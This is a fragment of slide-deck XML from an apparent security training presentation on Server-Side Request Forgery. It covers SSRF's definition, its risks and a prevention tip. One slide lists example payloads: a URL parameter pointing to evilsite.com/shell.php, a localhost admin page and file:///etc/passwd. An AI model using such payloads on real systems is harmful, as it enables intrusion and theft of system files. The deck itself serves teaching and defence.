                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1710"/>
          </a:p>
          <a:p>
            <a:pPr indent="-337185" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="500"/>
              </a:spcAft>
              <a:buSzPts val="1710"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1710"/>
              <a:t>Do not allow attackers use protocols other than expected, e.g. if the application is supposed to access contents of websites, allow only URLs that start with “https://”.</a:t>
            </a:r>
            <a:endParaRPr sz="17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What is SSRF?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146" name="Google Shape;146;p15"/>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SzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Server-Side Request Forgery</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 sz="2400"/>
              <a:t>Bypass Firewall, Touch Intranet</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 sz="2400"/>
              <a:t>Compromise Internal services (Admin console, Redis, database, etc.</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ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1755">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>(1)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1297500" y="3005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More Resources:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="310" name="Google Shape;310;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1297500" y="929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AutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html</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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/edit</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AutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>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What is SSRF?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152" name="Google Shape;152;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1297500" y="1427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It is a web security vulnerability that allows an attacker to stimulate the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing.</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Create request from vulnerable server to intranet/internet.</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Criminals usually use SSRF attacks to target internal systems that are behind firewalls and are not accessible from the external network.</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With SSRF it’s possible to access these system.</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1755">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>(2)</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What is SSRF?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158" name="Google Shape;158;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1297500" y="142770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Using a protocol supported by available URI schemas, you can communicate with services running on other protocols.</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By providing URLs to unexpected hosts or ports, attackers can make it appear that server is sending the request, possibly bypassing access controls such as firewall that prevent from accessing the URLs  directly.</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The server can be used to do port scanning of hosts in internal networks, use other URLs such as that can access documents on the system (using file://)</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1755">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>(3)</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152400" y="152400"/>
            <a:ext cx="8860375" cy="48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Risks-Impact of a SSRF Attack</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="169" name="Google Shape;169;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Port scanning: A user can scan the port of a particular website through the vulnerable web application which is processing the user’s URL.</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Fingerprinting intranet.</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Attacking internal or external web applications.</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Reading local web server files using the file:/// protocol handler.</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="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In some cases, a successful SSRF attack can even lead to Remote Code Execution (RCE).</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How is an SSRF Vulnerability Exploited</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="175" name="Google Shape;175;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1297500" y="1116150"/>
            <a:ext cx="7038900" cy="402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t>There are 2 ways by which an SSRF vulnerability is usually exploited:</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Trying to access or load sensitive content from the server. </a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr indent="-349250" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1900"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900"/>
              <a:t>Trying to access a trust relationship that often emerges when the application server connects with back-end systems that have private IP addresses that are not routable and mostly limited to public users.</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900"/>
              <a:t>Example -&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1755">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>(1)</a:t>
            </a:r>
            <a:endParaRPr sz="1900"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="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281950" y="75775"/>
            <a:ext cx="7038900" cy="506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525"/>
              <a:t>Consider the below request:</a:t>
            </a:r>
            <a:endParaRPr sz="1525"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="50000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1525"/>
              <a:t>GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1525" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://xyz.com/id?content=dashboard.php</a:t>
            </a:r>
            <a:endParaRPr sz="1525"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="30000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1525"/>
              <a:t>This request can be tested using several payloads like:</a:t>
            </a:r>
            <a:endParaRPr sz="1525"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="30000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1525"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="30000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1525"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1625">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Loading file content</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1625">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1525"/>
              <a:t>GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1525" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://xyz.com/id?content=https://evilsite.com/shell.php</a:t>
            </a:r>
            <a:endParaRPr sz="1525"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="30000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1525"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1625">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Accessing a restricted page</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1625">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1525"/>
              <a:t>GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1525" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://xyz.com/id?content=http://localhost/administrator</a:t>
            </a:r>
            <a:endParaRPr sz="1525"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1525"/>
              <a:t>The loopback interface can be used to access the content that is accessible only for the host. This states that we have access to the host, which implies we also have access to the admin page.</a:t>
            </a:r>
            <a:endParaRPr sz="1525"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="30000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1525"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1625">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fetching a local file</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1625">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1525"/>
              <a:t>file:/// protocol handler can be used to fetch a local file.</a:t>
            </a:r>
            <a:endParaRPr sz="1525"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1525"/>
              <a:t>GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1525" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://xyz.com/id?content=file:///etc/passwd</a:t>
            </a:r>
            <a:endParaRPr sz="1525"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1755">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>(2)</a:t>
            </a:r>
            <a:endParaRPr sz="15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